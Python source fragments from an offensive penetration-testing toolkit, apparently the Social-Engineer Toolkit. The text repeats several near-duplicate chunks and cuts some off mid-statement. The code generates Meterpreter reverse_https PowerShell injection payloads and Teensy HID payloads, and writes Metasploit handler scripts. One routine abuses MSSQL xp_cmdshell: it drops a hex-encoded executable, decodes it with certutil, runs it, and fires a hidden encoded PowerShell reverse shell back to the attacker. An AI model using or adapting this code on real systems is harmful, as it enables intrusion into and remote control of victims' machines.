domain = "WORKGROUP" # set the threads if threads == "": threads = "15" payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower() # # payload generation for powershell injection # try: # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" core.update_options("PORT={0}".format(port)) with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep
# Python3 renamed raw_input to input try: input = raw_input except NameError: pass core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5) show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu) powershell_menu_choice = input(core.setprompt(["29"], "")) if powershell_menu_choice != "99": # specify ipaddress of reverse listener #ipaddr = core.grab_ipaddress() ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ") core.update_options("IPADDR=" + ipaddr) # if we select alphanumeric shellcode if powershell_menu_choice == "1": port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT=" + port) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: filewrite.write("windows/meterpreter/reverse_https {},".format(port)) try: core.module_reload(src.payloads.powershell.prep)
# Py2/3 compatibility # Python3 renamed raw_input to input try: input = raw_input except NameError: pass # see if we are tracking emails track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower() # grab the randomized applet name applet_name = core.check_options("APPLET_NAME=") if applet_name == "": applet_name = core.generate_random_string(6, 15) + ".jar" core.update_options("APPLET_NAME=" + applet_name) # define if we are using a custom payload custom = 0 if core.check_options("CUSTOM_EXE="): custom = 1 core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.") # here we need to modify the java applet to recognize custom attribute with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen: data = fileopen.read() with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
""") print("[*] Payload has been extracted. Copying file to {0}".format( os.path.join(core.setdir + "reports/teensy.pde"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port))
""" % (core.powershell_encodedcommand()) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port)) print("[*] Launching Metasploit....") try:
def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password) core.print_status("Enabling the xp_cmdshell stored procedure...") try: conn.execute_query( "exec master.dbo.sp_configure 'show advanced options',1;" "GO;" "RECONFIGURE;" "GO;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "GO;" "RECONFIGURE;" "GO") except: pass # just throw a simple command via powershell to get the output try: print( """Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""" ) choice = input("Enter your choice:\n\n" "1.) Use PowerShell Injection (recommended)\n" "2.) Use Certutil binary conversion\n\n" "Enter your choice [1]:") if choice == "": choice = "1" if choice == "1": core.print_status( "Powershell injection was selected to deploy to the remote system (awesome)." ) option_ps = input( "Do you want to use powershell injection? [yes/no]:") if option_ps.lower( ) == "" or option_ps == "y" or option_ps == "yes": option = "1" core.print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: core.print_status("Powershell not selected, using debug method.") option = "2" except Exception as err: print(err) payload_filename = None # if we don't have powershell if option == "2": # give option to use msf or your own core.print_status("You can either select to use a default " "Metasploit payload here or import your " "own in order to deliver to the system. " "Note that if you select your own, you " "will need to create your own listener " "at the end in order to capture this.\n\n") choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") if choice1 == "": choice1 = "1" if choice1 == "2": attempts = 0 while attempts <= 2: payload_filename = input( "Enter the path to your file you want to deploy to the system (ex /root/blah.exe):" ) if os.path.isfile(payload_filename): break else: core.print_error("File not found! Try again.") attempts += 1 else: core.print_error( "Computers are hard. Find the path and try again. Defaulting to Metasploit payload." ) choice1 = "1" if choice1 == "1": web_path = None prep_powershell_payload() # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set if os.path.isfile(os.path.join(core.setdir + "set.payload")): web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": web_path = core.setdir # if it isn't there yet if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen( "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen( "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status( "Starting the Metasploit listener...") msf_path = core.meta_path() child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format( os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": core.print_status( "Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input( core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write( "windows/meterpreter/reverse_https {0},".format(port)) try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): os.makedirs(os.path.join(core.setdir + "reports/powershell")) with open(os.path.join(core.setdir + "x86.powershell")) as x86: x86 = x86.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format( x86) core.print_status("If you want the powershell commands and attack, " "they are exported to {0}".format( os.path.join(core.setdir + "reports/powershell"))) with open( os.path.join( core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: filewrite.write(x86) # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" with open( os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite: filewrite.write( "use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" "set LHOST 0.0.0.0\n" "exploit -j".format(port)) else: powershell_command = None # grab the metasploit path from config or smart detection msf_path = core.meta_path() if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("{0} -r {1}".format( os.path.join(msf_path + "msfconsole"), os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status( "Waiting for the listener to start first before we continue forward..." ) core.print_status( "Be patient, Metasploit takes a little bit to start...") child2.expect("Starting the payload handler", timeout=30000) core.print_status( "Metasploit started... Waiting a couple more seconds for listener to activate.." ) time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # here we start the conversion and execute the payload core.print_status( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: fileopen = open(core.setdir + 'payload.hex', "r") core.print_status("Dropping initial begin certificate header...") conn.execute_query( "exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'" .format(random_exe)) while fileopen: data = fileopen.read(900).rstrip() #for data in fileopen.read(900).rstrip(): if data == "": break core.print_status( "Deploying payload to victim machine (hex): {bold}{data}{endc}\n" .format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC)) conn.execute_query( "exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format( data=data, exe=random_exe)) core.print_status( "Delivery complete. Converting hex back to binary format.") core.print_status( "Dropping end header for binary format conversion...") conn.execute_query( "exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'" .format(random_exe)) core.print_status( "Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled." ) conn.execute_query( "exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'". format(random_exe)) core.print_status( "Executing the payload - magic has happened and now its time for that moment.. " "You know. When you celebrate. Salute to you ninja - you deserve it." ) conn.execute_query( "exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status( "Spawning separate child process for listener...") try: shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options # if core.check_options("PORT=") != 0: # port = core.heck_options("PORT=") # # # if for some reason the port didnt get created we default to 443 # else: # port = "443" # thread is needed here due to the connect not always terminating thread, # it hangs if thread isnt specified try: core.module_reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") sql_command = ( "exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command, )) # using the old method if option == "2": core.print_status("Triggering payload stager...") alphainject = "" if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format( random_exe, alphainject)) # start thread of SQL command that executes payload thread.start_new_thread(conn.execute_query, (sql_command, )) time.sleep(1) # if pexpect doesnt exit right then it freaks out if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password) core.print_status("Enabling the xp_cmdshell stored procedure...") try: conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;" "GO;" "RECONFIGURE;" "GO;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "GO;" "RECONFIGURE;" "GO") except: pass # just throw a simple command via powershell to get the output try: print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""") choice = input("Enter your choice:\n\n" "1.) Use PowerShell Injection (recommended)\n" "2.) Use Certutil binary conversion\n\n" "Enter your choice [1]:") if choice == "": choice = "1" if choice == "1": core.print_status("Powershell injection was selected to deploy to the remote system (awesome).") option_ps = input("Do you want to use powershell injection? [yes/no]:") if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes": option = "1" core.print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: core.print_status("Powershell not selected, using debug method.") option = "2" except Exception as err: print(err) payload_filename = None # if we don't have powershell if option == "2": # give option to use msf or your own core.print_status("You can either select to use a default " "Metasploit payload here or import your " "own in order to deliver to the system. " "Note that if you select your own, you " "will need to create your own listener " "at the end in order to capture this.\n\n") choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") if choice1 == "": choice1 = "1" if choice1 == "2": attempts = 0 while attempts <= 2: payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):") if os.path.isfile(payload_filename): break else: core.print_error("File not found! Try again.") attempts += 1 else: core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.") choice1 = "1" if choice1 == "1": web_path = None #prep_powershell_payload() import src.core.payloadgen.create_payloads # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set if os.path.isfile(os.path.join(core.setdir + "set.payload")): web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": web_path = core.setdir # if it isn't there yet if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": core.print_status("Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.setdir + "/payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.close() try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # launch powershell #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): os.makedirs(os.path.join(core.setdir + "reports/powershell")) #with open(os.path.join(core.setdir + "x86.powershell")) as x86: x86 = file(core.setdir + "x86.powershell").read().rstrip() # x86 = x86.read() x86 = "powershell -nop -window hidden -noni -e {0}".format(x86) core.print_status("If you want the powershell commands and attack, " "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" #with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite: filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w") filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" "set LHOST 0.0.0.0\n" "exploit -j".format(port)) filewrite.close() else: powershell_command = None # grab the metasploit path from config or smart detection msf_path = core.meta_path() if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metasploit takes a little bit to start...") #child2.expect("Starting the payload handler", timeout=30000) child2.expect("Processing", timeout=30000) core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..") time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # here we start the conversion and execute the payload core.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: fileopen = open(core.setdir + 'payload.hex', "r") core.print_status("Dropping initial begin certificate header...") conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) while fileopen: data = fileopen.read(900).rstrip() #for data in fileopen.read(900).rstrip(): if data == "": break core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC)) conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe)) core.print_status("Delivery complete. Converting hex back to binary format.") core.print_status("Dropping end header for binary format conversion...") conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe)) core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.") conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe)) core.print_status("Executing the payload - magic has happened and now its time for that moment.. " "You know. When you celebrate. Salute to you ninja - you deserve it.") conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status("Spawning separate child process for listener...") try: shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options # if core.check_options("PORT=") != 0: # port = core.heck_options("PORT=") # # # if for some reason the port didnt get created we default to 443 # else: # port = "443" # thread is needed here due to the connect not always terminating thread, # it hangs if thread isnt specified try: core.module_reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command,)) # using the old method if option == "2": core.print_status("Triggering payload stager...") alphainject = "" if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) # start thread of SQL command that executes payload thread.start_new_thread(conn.execute_query, (sql_command,)) time.sleep(1) # if pexpect doesnt exit right then it freaks out if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
domain = "WORKGROUP" # set the threads if threads == "": threads = "15" payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower() # # payload generation for powershell injection # try: # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" core.update_options("PORT={0}".format(port)) with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) try:
} """) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.pde"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port))
# Py2/3 compatibility # Python3 renamed raw_input to input try: input = raw_input except NameError: pass # see if we are tracking emails track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower() # grab the randomized applet name applet_name = core.check_options("APPLET_NAME=") if applet_name == "": applet_name = core.generate_random_string(6, 15) + ".jar" core.update_options("APPLET_NAME=" + applet_name) # define if we are using a custom payload custom = 0 if core.check_options("CUSTOM_EXE="): custom = 1 core.print_status( "Note that since you are using a custom payload, you will need to create your OWN listener." ) core.print_status( "SET has no idea what type of payload you are using, so you will need to set this up manually." ) core.print_status( "If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back." )
def prep_powershell_payload(): # grab stage encoding flag stage_encoding = core.check_config("STAGE_ENCODING=").lower() if stage_encoding == "off": stage_encoding = "false" else: stage_encoding = "true" # check to see if we are just generating powershell code powershell_solo = core.check_options("POWERSHELL_SOLO") # check if port is there port = core.check_options("PORT=") # check if we are using auto_migrate auto_migrate = core.check_config("AUTO_MIGRATE=") # check if we are using pyinjection pyinjection = core.check_options("PYINJECTION=") if pyinjection == "ON": # check to ensure that the payload options were specified right if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): pyinjection = "on" core.print_status("Multi/Pyinjection was specified. Overriding config options.") else: pyinjection = "off" # grab ipaddress if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter the ipaddress for the reverse connection: ") core.update_options("IPADDR=" + ipaddr) # check to see if we are using multi powershell injection multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() # turn off multi injection if pyinjection is specified if pyinjection == "on": multi_injection = "off" # check what payloads we are using powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") # if we specified a hostname then default to reverse https/http if not core.validate_ip(ipaddr): powershell_inject_x86 = "windows/meterpreter/reverse_http" # prompt what port to listen on for powershell then make an append to the current # metasploit answer file if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: data = fileopen.read() match = re.search(port, data) if not match: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set EnableStageEncoding {3}\n" "set ExitOnSession false\n" "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": # check to see if the meta config multi pyinjector is there if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): if core.check_options("PORT=") != 0: port = core.check_options("PORT=") # if port.options isnt there then prompt else: port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) # turn off multi_injection if we are riding solo from the powershell menu if powershell_solo == "ON": multi_injection = "off" pyinjection = "on" # if we are using multi powershell injection if multi_injection == "on" and pyinjection == "off": core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") # define a base variable x86 = "" # specify a list we will use for later multi_injection_x86 = "" # here we do some funky loops so we don't need to rewrite the code below if multi_injection == "on": port = core.check_config("POWERSHELL_MULTI_PORTS=") port = port.split(",") if multi_injection == "on": # iterate through the ports, used for POWERSHELL_MULTI_PORTS for ports in port: # dont cycle through if theres a blank if ports: core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set LPORT {3}\n" "set ExitOnSession false\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # if we aren't using multi pyinjector if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if meta config isn't created yet then create it if not os.path.isfile(): with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: filewrite.write("") port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set ExitOnSession false\n" "set LPORT {3}\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # here we do everything if pyinjection or multi pyinjection was specified if pyinjection == "on": injections = [] # read in the file we need for parsing with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = payloads.split(",") # format: payload<space>port for payload in payloads: # format: payload<space>port payload = payload.split(" ") powershell_inject_x86 = payload[0] port = payload[1] core.print_status("Generating x86-based powershell injection code...") injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) multi_injection_x86 = ",".join(injections) # if its turned to off if multi_injection == "off" and pyinjection == "off": core.print_status("Generating x86-based powershell injection code...") x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) # if we are specifying multi powershell injection if multi_injection == "on" or pyinjection == "on": x86 = multi_injection_x86[1:] # remove comma at beginning # check to see if we want to display the powershell command to the user verbose = core.check_config("POWERSHELL_VERBOSE=") if verbose.lower() == "on": core.print_status("Printing the x86 based encoded code...") time.sleep(3) print(x86) with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: filewrite.write(x86) core.print_status("Finished generating powershell injection bypass.") core.print_status("Encoded to bypass execution restriction policy...")